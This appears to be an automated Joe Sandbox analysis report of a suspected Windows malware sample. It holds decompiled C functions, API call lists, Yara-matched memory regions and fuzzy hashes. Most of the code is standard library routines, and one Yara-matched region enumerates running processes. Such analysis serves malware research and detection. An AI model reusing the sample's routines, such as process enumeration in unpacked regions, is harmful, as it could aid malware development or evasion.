                  					_t75 = 0 | _t101 != 0x00000000;
                  					if(_t101 != 0) {
                  						goto L1;
                  					}
                  					_t77 = _t94 - 0x15c;
                  					_t46 = GetFullPathNameA(_t45, 0x104, _t91, _t94 - 0x15c);
                  					if(_t46 != 0) {
                  						__eflags = _t46 - 0x104;
                  						if(_t46 < 0x104) {
                  							E004014C0(_t94 - 0x154, _t89);
                  							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
                  							E00428F81(_t73, __eflags, _t91, _t94 - 0x154);
                  							_t50 = PathIsUNCA( *(_t94 - 0x154));
                  							__eflags = _t50;
                  							if(_t50 != 0) {
                  								L21:
                  								E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
                  								__eflags = 1;
                  								goto L22;
                  							}
                  							_t55 = GetVolumeInformationA( *(_t94 - 0x154), _t50, _t50, _t50, _t94 - 0x164, _t94 - 0x160, _t50, _t50);
                  							__eflags = _t55;
                  							if(_t55 != 0) {
                  								__eflags =  *(_t94 - 0x160) & 0x00000002;
                  								if(( *(_t94 - 0x160) & 0x00000002) == 0) {
                  									CharUpperA(_t91);
                  								}
                  								__eflags =  *(_t94 - 0x160) & 0x00000004;
                  								if(( *(_t94 - 0x160) & 0x00000004) == 0) {
                  									_t57 = FindFirstFileA( *(_t94 - 0x158), _t94 - 0x150);
                  									__eflags = _t57 - 0xffffffff;
                  									if(_t57 == 0xffffffff) {
                  										goto L21;
                  									}
                  									FindClose(_t57);
                  									__eflags =  *(_t94 - 0x15c);
                  									if( *(_t94 - 0x15c) == 0) {
                  										goto L11;
                  									}
                  									__eflags =  *(_t94 - 0x15c) - _t91;
                  									if( *(_t94 - 0x15c) <= _t91) {
                  										goto L11;
                  									}
                  									_t63 = lstrlenA(_t94 - 0x124);
                  									_t86 =  *(_t94 - 0x15c) - _t91;
                  									__eflags = _t63 + _t86 - 0x104;
                  									if(_t63 + _t86 >= 0x104) {
                  										__eflags = _t73;
                  										if(_t73 != 0) {
                  											 *((intOrPtr*)(_t73 + 8)) = 3;
                  											E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
                  										}
                  										L12:
                  										E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
                  										goto L5;
                  									}
                  									__eflags = 0x104;
                  									E00414FEE(_t73, _t89, _t91, 0x104,  *(_t94 - 0x15c), 0x104, _t94 - 0x124);
                  								}
                  								goto L21;
                  							}
                  							L11:
                  							E004290E3(_t73,  *(_t94 - 0x158));
                  							goto L12;
                  						}
                  						__eflags = _t73;
                  						if(_t73 != 0) {
                  							 *((intOrPtr*)(_t73 + 8)) = 3;
                  							E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
                  						}
                  						goto L5;
                  					} else {
                  						E004048ED(_t73, _t77, _t91, 0x104, _t91, 0x104,  *(_t94 - 0x158), 0xffffffff);
                  						E004290E3(_t73,  *(_t94 - 0x158));
                  						L5:
                  						L22:
                  						return E00431B87(_t73, _t91, 0x104);
                  					}
                  				}
                  				L1:
                  				_t45 = E00406436(_t73, _t75, _t91, _t92, _t100);
                  				goto L2;
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042911C
                  • GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,004292E3,?,?,00000000,?,0041D5EC,?,?), ref: 0042915A
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • PathIsUNCA.SHLWAPI(?,?,?,?,0041D5EC,?,?), ref: 004291CA
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0041D5EC,?,?), ref: 004291F1
                  • CharUpperA.USER32(?), ref: 00429224
                  • FindFirstFileA.KERNEL32(?,?), ref: 00429240
                  • FindClose.KERNEL32(00000000), ref: 0042924C
                  • lstrlenA.KERNEL32(?), ref: 0042926A
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                  • String ID:
                  • API String ID: 624941980-0
                  • Opcode ID: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction ID: 4c08258b8b62b4c28abc3044bc15ce8abfe974271ea14c90092fafafccbe739e
                  • Opcode Fuzzy Hash: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction Fuzzy Hash: 1141C571A00225EBEF259F62DC48BFE7778BF45315F4005EEB405A5291DB384E90CE18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memcpy
                  • String ID:
                  • API String ID: 3131771470-0
                  • Opcode ID: 3def0143aba1b9c4904ee5e37ded57465d8e4f2471d1c15f6b51b8ae0e23b0d7
                  • Instruction ID: 4e95d0bce67c737067a9085a88c8ddc64bca97240b0523968c58713a5cf4176d
                  • Opcode Fuzzy Hash: 3def0143aba1b9c4904ee5e37ded57465d8e4f2471d1c15f6b51b8ae0e23b0d7
                  • Instruction Fuzzy Hash: 2C024730A0066AEFCB2ECF68C9856EAFB75FF44304F1401B9C85697B42D732A565CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00430650(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                  				intOrPtr _v0;
                  				void* _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _t6;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				intOrPtr _t13;
                  				long _t17;
                  				intOrPtr _t21;
                  				intOrPtr _t22;
                  				intOrPtr _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr* _t31;
                  				void* _t34;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ecx;
                  				_t21 = __ebx;
                  				_t6 = __eax;
                  				_t34 = _t22 -  *0x463404; // 0x38a11573
                  				if(_t34 == 0) {
                  					asm("repe ret");
                  				}
                  				 *0x466af0 = _t6;
                  				 *0x466aec = _t22;
                  				 *0x466ae8 = _t25;
                  				 *0x466ae4 = _t21;
                  				 *0x466ae0 = _t27;
                  				 *0x466adc = _t26;
                  				 *0x466b08 = ss;
                  				 *0x466afc = cs;
                  				 *0x466ad8 = ds;
                  				 *0x466ad4 = es;
                  				 *0x466ad0 = fs;
                  				 *0x466acc = gs;
                  				asm("pushfd");
                  				_pop( *0x466b00);
                  				 *0x466af4 =  *_t31;
                  				 *0x466af8 = _v0;
                  				 *0x466b04 =  &_a4;
                  				 *0x466a40 = 0x10001;
                  				_t11 =  *0x466af8; // 0x0
                  				 *0x4669f4 = _t11;
                  				 *0x4669e8 = 0xc0000409;
                  				 *0x4669ec = 1;
                  				_t12 =  *0x463404; // 0x38a11573
                  				_v812 = _t12;
                  				_t13 =  *0x463408; // 0xc75eea8c
                  				_v808 = _t13;
                  				 *0x466a38 = IsDebuggerPresent();
                  				_push(1);
                  				E0043F5DB(_t14);
                  				SetUnhandledExceptionFilter(0);
                  				_t17 = UnhandledExceptionFilter("�iF");
                  				if( *0x466a38 == 0) {
                  					_push(1);
                  					E0043F5DB(_t17);
                  				}
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00436667
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043667C
                  • UnhandledExceptionFilter.KERNEL32(iF), ref: 00436687
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 004366A3
                  • TerminateProcess.KERNEL32(00000000), ref: 004366AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID: iF
                  • API String ID: 2579439406-3484524759
                  • Opcode ID: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction ID: 1fcaefbcb6034eab115c8829309213c744fcf1b54137cc21ca0acf14dfd41614
                  • Opcode Fuzzy Hash: 7d31ead20e52c6ad08ea01f80d0920bbbaf99ce8ff4a02c4ab0ad5d6fcf752bd
                  • Instruction Fuzzy Hash: 1E21F2B8801200EFC700DF95ED45A047BA8FB0A311F12907AE809A7B61F7F199858F4F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040963B(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int* _t45;
                  				int _t46;
                  				void* _t53;
                  				void* _t61;
                  				signed int _t62;
                  				intOrPtr* _t65;
                  				intOrPtr _t66;
                  				void* _t67;
                  				int _t68;
                  				intOrPtr* _t74;
                  
                  				_t64 = __ecx;
                  				_push(__ecx);
                  				_push(_t61);
                  				_push(_t67);
                  				_t74 = __ecx;
                  				_t66 = E0040F8D7(__ecx);
                  				_v8 = _t66;
                  				_t76 = _t66;
                  				if(_t66 == 0) {
                  					E00406436(_t61, _t64, _t67, _t74, _t76);
                  				}
                  				_t65 =  *((intOrPtr*)(_t74 + 0x80));
                  				_t62 = _a8;
                  				_t68 = _a4;
                  				if(_t65 == 0) {
                  					L5:
                  					if(_t62 != 0xffff) {
                  						_t45 = _t74 + 0xdc;
                  						__eflags =  *_t45;
                  						if( *_t45 != 0) {
                  							 *_t45 =  *_t45 & 0x00000000;
                  							__eflags = _t62 & 0x00002000;
                  							if((_t62 & 0x00002000) != 0) {
                  								__eflags =  *(_t74 + 0xd0) & 0x00000001;
                  								if(( *(_t74 + 0xd0) & 0x00000001) == 0) {
                  									_t65 = _t74;
                  									 *((intOrPtr*)( *_t74 + 0x160))(2);
                  									_t66 = _v8;
                  								}
                  							}
                  						}
                  						__eflags = _t68;
                  						if(_t68 == 0) {
                  							L28:
                  							_t36 = _t74 + 0xa8;
                  							 *_t36 =  *(_t74 + 0xa8) & 0x00000000;
                  							__eflags =  *_t36;
                  							goto L29;
                  						} else {
                  							__eflags = _t62 & 0x00000810;
                  							if((_t62 & 0x00000810) != 0) {
                  								goto L28;
                  							}
                  							__eflags = _t68 - 0xf000 - 0x1ef;
                  							if(_t68 - 0xf000 > 0x1ef) {
                  								__eflags = _t68 - 0xff00;
                  								if(_t68 < 0xff00) {
                  									L25:
                  									 *(_t74 + 0xa8) = _t68;
                  									L29:
                  									_t38 = _t66 + 0x3c;
                  									 *_t38 =  *(_t66 + 0x3c) | 0x00000040;
                  									__eflags =  *_t38;
                  									goto L30;
                  								}
                  								 *(_t74 + 0xa8) = 0xef1f;
                  								goto L29;
                  							}
                  							_t68 = (_t68 + 0xffff1000 >> 4) + 0xef00;
                  							__eflags = _t68;
                  							goto L25;
                  						}
                  					} else {
                  						 *(_t74 + 0x3c) =  *(_t74 + 0x3c) & 0xffffffbf;
                  						if( *((intOrPtr*)(_t66 + 0x68)) != 0) {
                  							 *(_t74 + 0xa8) = 0xe002;
                  						} else {
                  							 *(_t74 + 0xa8) = 0xe001;
                  						}
                  						SendMessageA( *(_t74 + 0x20), 0x362,  *(_t74 + 0xa8), 0);
                  						_t65 = _t74;
                  						_t53 =  *((intOrPtr*)( *_t74 + 0x16c))();
                  						if(_t53 != 0) {
                  							UpdateWindow( *(_t53 + 0x20));
                  						}
                  						if(_a12 == 0 && ( *(_t74 + 0xd0) & 0x00000001) == 0 && GetKeyState(0x79) >= 0 && GetKeyState(0x12) >= 0 &&  *((intOrPtr*)(_t74 + 0xe0)) == 0) {
                  							_t65 = _t74;
                  							 *((intOrPtr*)( *_t74 + 0x160))(2);
                  						}
                  						L30:
                  						_t46 =  *(_t74 + 0xa8);
                  						if(_t46 !=  *((intOrPtr*)(_t74 + 0xac))) {
                  							_t46 = E0040EE3C(_t62, _t65, GetParent( *(_t74 + 0x20)));
                  							if(_t46 != 0) {
                  								_t46 = PostMessageA( *(_t74 + 0x20), 0x36a, 0, 0);
                  							}
                  						}
                  						L33:
                  						return _t46;
                  					}
                  				}
                  				_t46 =  *((intOrPtr*)( *_t65 + 0x7c))(_t68, _t62, _a12);
                  				if(_t46 != 0) {
                  					goto L33;
                  				} else {
                  					_t66 = _v8;
                  					goto L5;
                  				}
                  			}

                  APIs
                  • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 004096BA
                  • UpdateWindow.USER32(?), ref: 004096D1
                  • GetKeyState.USER32(00000079), ref: 004096F6
                  • GetKeyState.USER32(00000012), ref: 00409703
                  • GetParent.USER32(?), ref: 004097B7
                  • PostMessageA.USER32 ref: 004097D3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageState$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                  • String ID:
                  • API String ID: 2390574533-0
                  • Opcode ID: ae058b2c06a74a6d7ef1909f88a98cdc82120343aa06eeab77f5458c972cfe29
                  • Instruction ID: 1836aa11c96bc8b10af671f839b277ded5f5f4f49e82c4a39b0a723545f5ede0
                  • Opcode Fuzzy Hash: ae058b2c06a74a6d7ef1909f88a98cdc82120343aa06eeab77f5458c972cfe29
                  • Instruction Fuzzy Hash: 9541D536610705DFE7209F21C848FAB77A5BF51304F14483AE58A672D2CBBEAC40CB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E00415026(void* __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
                  				signed int _v8;
                  				char _v284;
                  				char _v288;
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				struct HINSTANCE__* _t13;
                  				intOrPtr* _t20;
                  				intOrPtr _t28;
                  				intOrPtr _t29;
                  				void* _t30;
                  				intOrPtr _t36;
                  				signed int _t37;
                  				void* _t39;
                  				intOrPtr _t40;
                  				signed int _t45;
                  				void* _t46;
                  
                  				_t36 = __edi;
                  				_t35 = __edx;
                  				_t31 = __ecx;
                  				_t43 = _t45;
                  				_t46 = _t45 - 0x11c;
                  				_t9 =  *0x463404; // 0x38a11573
                  				_v8 = _t9 ^ _t45;
                  				_t49 = _a4 - 0x800;
                  				_t39 = __ecx;
                  				_t28 = __edx;
                  				if(_a4 != 0x800) {
                  					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                  					if(__eflags == 0) {
                  						goto L10;
                  					} else {
                  						goto L4;
                  					}
                  				} else {
                  					E004048C1(__edx, _t31, __edi, _t39, E00433C67(__edx,  &_v288, 4, "LOC"));
                  					_t46 = _t46 + 0x10;
                  					L4:
                  					_push(_t36);
                  					_t37 =  *(E00431D3E(_t49));
                  					 *(E00431D3E(_t49)) =  *_t16 & 0x00000000;
                  					_push( &_v288);
                  					_t30 = E00431BC3( &_v284, 0x112, 0x111, _t39, _t28);
                  					_t20 = E00431D3E(_t49);
                  					_t50 =  *_t20;
                  					if( *_t20 == 0) {
                  						 *(E00431D3E(__eflags)) = _t37;
                  					} else {
                  						E00405B7A( *((intOrPtr*)(E00431D3E(_t50))));
                  					}
                  					_pop(_t36);
                  					if(_t30 == 0xffffffff || _t30 >= 0x112) {
                  						L10:
                  						_t13 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t13 = LoadLibraryA( &_v284);
                  					}
                  				}
                  				_pop(_t40);
                  				_pop(_t29);
                  				return E00430650(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
                  			}






















                  APIs
                  • _strcpy_s.LIBCMT ref: 00415058
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 00415070
                  • __snwprintf_s.LIBCMT ref: 004150A5
                  • LoadLibraryA.KERNEL32(?), ref: 004150E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
                  • String ID: LOC
                  • API String ID: 1155623865-519433814
                  • Opcode ID: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction ID: 9d7d416408e1e055de0116fb72f58f37d90779cb6da9a35a11098e22952e4239
                  • Opcode Fuzzy Hash: 0a57662b79aad635622cb36225d1b1c81f588a9f19dbb1269fc2e23230394805
                  • Instruction Fuzzy Hash: 49210D71700608EBD7217BA5CC46BDE37ACEF4A315F100867F205A71E1DA7C9E458AA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID:
                  • API String ID: 2102423945-0
                  • Opcode ID: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction ID: f98831e3c7eae32b0ab60125a26eacce2da9133b5da6bf3e8bc862731f23f913
                  • Opcode Fuzzy Hash: 12cd56997e3f0884bb4048a204ef5554fe657667fb4b2673287a6229841dc1e0
                  • Instruction Fuzzy Hash: 17025930910A6AEFCB1ACFA8C8947EAFB75FF06304F14027ACE5597645C736A561CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00418BD1(void* __ecx, int _a4, int _a8) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				int _t12;
                  				void* _t15;
                  				void* _t16;
                  				int _t19;
                  				void* _t20;
                  
                  				_t17 = __ecx;
                  				_t19 = _a4;
                  				_t22 = _t19;
                  				if(_t19 == 0) {
                  					E00406436(_t15, __ecx, _t19, _t20, _t22);
                  				}
                  				_t16 = E0040EE3C(_t15, _t17, GetParent( *(_t19 + 0x20)));
                  				_t18 = _t16;
                  				if(E0041E99D(_t16, ?str?) != 0) {
                  					__eflags = _a8;
                  					if(_a8 != 0) {
                  						L8:
                  						return _t16;
                  					}
                  					while(1) {
                  						_t19 = E0040EE3C(_t16, _t18, GetParent( *(_t19 + 0x20)));
                  						__eflags = _t19;
                  						if(_t19 == 0) {
                  							goto L8;
                  						}
                  						_t12 = IsIconic( *(_t19 + 0x20));
                  						__eflags = _t12;
                  						if(_t12 != 0) {
                  							goto L3;
                  						}
                  					}
                  					goto L8;
                  				} else {
                  					L3:
                  					return 0;
                  				}
                  			}













                  APIs
                  • GetParent.USER32(?), ref: 00418BEE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • IsIconic.USER32 ref: 00418C17
                  • GetParent.USER32(?), ref: 00418C24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Parent$Exception@8H_prolog3IconicThrow
                  • String ID: `&E
                  • API String ID: 144390861-1929257993
                  • Opcode ID: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction ID: 358e4306ae026a5a0e6fe1444b68b5067069f487fe9c63fcbe7e632c9dba3896
                  • Opcode Fuzzy Hash: 3561b35d5b5b2dccbb8c54f4d40102134b81d5a0a069d7fdc0debe60c0056d39
                  • Instruction Fuzzy Hash: C3F0A4353012096BDB202B73CC44A57BB5AEB903A4B11443FF80897210FE38DC5196F8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E0040C49C(struct HWND__* _a4, signed int _a8) {
                  				struct _WINDOWPLACEMENT _v48;
                  				int _t16;
                  
                  				if(E0040C354() == 0) {
                  					if((_a8 & 0x00000003) == 0) {
                  						if(IsIconic(_a4) == 0) {
                  							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                  						} else {
                  							_t16 = GetWindowPlacement(_a4,  &_v48);
                  						}
                  						if(_t16 == 0) {
                  							return 0;
                  						} else {
                  							return E0040C44B( &(_v48.rcNormalPosition), _a8);
                  						}
                  					}
                  					return 0x12340042;
                  				}
                  				return  *0x46631c(_a4, _a8);
                  			}






                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID: )@
                  • API String ID: 0-1834664782
                  • Opcode ID: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction ID: e39f0cd06dcc5d796e4c380b87086b00b9923f70f7885cf755144c167b23d7c0
                  • Opcode Fuzzy Hash: 04563866b8390392b53dc5f501e0bdb632abd845a72dbd0a999c9ac41fcd9bfc
                  • Instruction Fuzzy Hash: 14F01D35500108FBCF019FA1DC989BE7B69BB04344B548132FC15E51A0EB38DA56DB5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E0040F3F3(void* __ecx) {
                  				signed int _t5;
                  				void* _t15;
                  				void* _t18;
                  
                  				_t15 = __ecx;
                  				if((E00412B38(__ecx) & 0x40000000) != 0) {
                  					L6:
                  					_t5 = E0040ED96(_t15, __eflags);
                  					asm("sbb eax, eax");
                  					return  ~( ~_t5);
                  				}
                  				_t18 = E00403AA0();
                  				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                  					goto L6;
                  				} else {
                  					SendMessageA( *(_t18 + 0x20), 0x111, 0xe146, 0);
                  					return 1;
                  				}
                  			}







                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetKeyState.USER32(00000010), ref: 0040F419
                  • GetKeyState.USER32(00000011), ref: 0040F422
                  • GetKeyState.USER32(00000012), ref: 0040F42B
                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0040F441
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: State$LongMessageSendWindow
                  • String ID:
                  • API String ID: 1063413437-0
                  • Opcode ID: 1899dafdfafa182dae73c6467cc00530cdf17fdce013a3a603e072924edb97ca
                  • Instruction ID: 270587ebcd8374511dc7763f2ca35ec055206ec1d6bb96e95a8e8fcfe1b62cfc
                  • Opcode Fuzzy Hash: 1899dafdfafa182dae73c6467cc00530cdf17fdce013a3a603e072924edb97ca
                  • Instruction Fuzzy Hash: 86F0E93634129A66EA3037724C41FA72D145FA1B9CF04043B7F01FA5D2CDB8D805027A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02311954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 02311973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02311983
                  • CloseHandle.KERNEL32(00000000), ref: 0231199F
                    • Part of subcall function 02312255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,0231199A,0000022C), ref: 02312273
                    • Part of subcall function 02312255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,0231199A,0000022C), ref: 02312284
                    • Part of subcall function 02312255: lstrcpyW.KERNEL32(00000004,?), ref: 023122B6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: 881bf22f0b8eb8c12aa429e3a493a387c75fae2e217d6605055c958634ac79b6
                  • Instruction ID: 976f74ae00c6d524d40173f0aec0ba1599afe36a1ab3a1826384190c7e72da94
                  • Opcode Fuzzy Hash: 881bf22f0b8eb8c12aa429e3a493a387c75fae2e217d6605055c958634ac79b6
                  • Instruction Fuzzy Hash: C4F0F0719021287AE7386675BC0CBEFBA7CDB49320F1001A5ED19E2080E770891E8AE0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E0042E202(intOrPtr __ebx, signed int __edx, CHAR* _a4, signed int* _a8) {
                  				signed int _v8;
                  				struct _WIN32_FIND_DATAA _v328;
                  				char _v336;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t49;
                  				intOrPtr _t52;
                  				void* _t54;
                  				void* _t56;
                  				signed int* _t81;
                  				signed int* _t84;
                  				signed int* _t87;
                  				signed int _t90;
                  				CHAR* _t105;
                  				intOrPtr _t106;
                  				signed int* _t109;
                  				intOrPtr _t110;
                  				signed int _t114;
                  
                  				_t103 = __edx;
                  				_t89 = __ebx;
                  				_t112 = _t114;
                  				_t49 =  *0x463404; // 0x38a11573
                  				_v8 = _t49 ^ _t114;
                  				_t109 = _a8;
                  				_t105 = _a4;
                  				if(_t105 != 0) {
                  					if(lstrlenA(_t105) >= 0x104) {
                  						goto L2;
                  					} else {
                  						_push(__ebx);
                  						_t90 =  &(_t109[8]);
                  						_t54 = E004292D1(_t90, _t105);
                  						if(_t54 != 0) {
                  							_t56 = FindFirstFileA(_t105,  &_v328);
                  							_t91 = _t90 | 0xffffffff;
                  							if(_t56 != (_t90 | 0xffffffff)) {
                  								FindClose(_t56);
                  								_t109[8] = _v328.dwFileAttributes & 0x0000007f;
                  								_t103 = 0;
                  								_t109[6] = E00435090(_v328.nFileSizeHigh, 0x20, 0);
